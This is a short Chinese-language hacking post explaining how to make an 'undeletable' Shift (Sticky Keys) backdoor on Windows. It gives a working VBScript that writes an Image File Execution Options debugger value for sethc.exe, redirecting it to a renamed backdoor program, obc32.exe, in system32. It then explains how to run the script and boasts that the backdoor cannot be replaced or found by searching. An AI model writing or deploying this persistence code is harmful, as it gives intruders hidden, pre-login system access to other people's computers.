生成删不掉的Shift后门

大家都知道Shift后门对应的文件为：sethc.exe

只要把sethc.exe挟持，别人就删不掉了。

程序代码：
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\debugger",WScript.CreateObject("WScript.shell").ExpandEnvironmentStrings("%SystemRoot%")&"\system32\obc32.exe","REG_SZ"


把上面代码保存为 *.vbs, 然后运行vbs就可以了

用来挟持shift的，让别人替换不了你的后门

这里注意了，shift后门文件名可以随便写，我这里是obc32.exe

这样在电脑里也搜索不到sethc.exe,哈哈

但必须跟代码里的文件名对应上，system32目录下的